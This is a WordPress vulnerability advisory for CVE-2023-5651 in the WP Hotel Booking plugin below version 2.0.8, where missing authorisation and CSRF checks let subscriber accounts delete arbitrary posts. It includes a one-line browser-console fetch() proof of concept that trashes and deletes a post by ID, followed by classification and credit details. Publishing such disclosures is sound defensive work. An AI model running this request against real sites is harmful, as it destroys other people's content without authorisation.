WordPress Plugin Vulnerabilities

WP Hotel Booking < 2.0.8 - Subscriber+ Arbitrary Post Deletion

Description

The plugin does not have authorisation and CSRF checks, as well as does not ensure that the package to be deleted is a package, allowing any authenticated users, such as subscriber to delete arbitrary posts

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user. This will put the post with ID 1 in the trash. Run it again to then delete the post

fetch("/wp-admin/admin-ajax.php", {"headers": {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"},"body": 'action=tp_extra_package_remove&package_id=1',"method": "POST"});

Affects Plugins

Plugin icon
wp-hotel-booking
Fixed in 2.0.8

References

CVE
CVE-2023-5651

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
6.5 (medium)

Miscellaneous

Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
https://cert.pl
Submitter twitter
cert_polska_en
Verified
Yes
WPVDB ID
a365c050-96ae-4266-aa87-850ee259ee2c

Timeline

Publicly Published
2023-10-26 (about 6 months ago)
Added
2023-10-26 (about 6 months ago)
Last Updated
2023-10-26 (about 6 months ago)

Other

Published
Title
Published
2023-09-01
Title
Better Elementor Addons < 1.3.9 - Subscriber+ Settings Update / Reset
Published
2024-04-25
Title
WooCommerce Amazon Affiliates - Wordpress Plugin <= 14.0.10 - Missing Authorization
Published
2023-03-15
Title
WP Email Capture < 3.11 - Unauthenticated Email Capture Download
Published
2023-12-27
Title
Slider by Soliloquy < 2.7.3 - Subscriber+ Slider Data Access
Published
2023-11-13
Title
AWeber < 7.3.10 - Missing Authorization via AJAX actions